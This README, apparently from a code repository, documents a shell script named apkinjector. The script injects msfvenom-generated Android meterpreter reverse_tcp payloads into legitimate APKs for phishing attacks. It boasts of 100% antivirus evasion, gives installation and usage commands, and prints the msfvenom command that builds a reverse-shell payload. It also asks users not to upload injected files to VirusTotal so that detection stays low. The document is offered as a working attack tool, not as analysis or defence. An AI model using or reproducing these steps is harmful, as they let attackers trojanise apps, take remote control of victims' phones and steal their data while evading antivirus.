
Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.

Primary LanguageShell


This script is no longer supported. Please use APKWash.

Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.

-- Please do not upload "injected" files to VirusTotal.com --

Success Rate:
-100% AV Evasion to date (0/35 on nodistribute, confirmed on AVG and Kaspersky mobile)
-~70% automatic injection
-May require user input, or manually adding the invoke command. The output will explain what is needed.
-If APKTool fails to decompile, or compile, then the injection will fail. On major apps like Facebook, Starbucks, etc you may find this to happen.

chmod +x apkinjector
mv apkinjector /usr/local/bin/.

On first run:
-Downloads and places apktool.jar in the user's /usr/local/bin directory
-Generates debug keystore for signing. Places it in ~/.android/
NOTE: If wanting to customize each signature, then remove the keystore before running the script.

apkinjector <payload>.apk <original>.apk

This script takes a msfgenerated payload as input along with an .apk you want to inject into.
To generate the payload: msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o <payload>.apk


Comment out the removal of the /tmp/payload and /tmp/original directories to see the file structure that was compiled.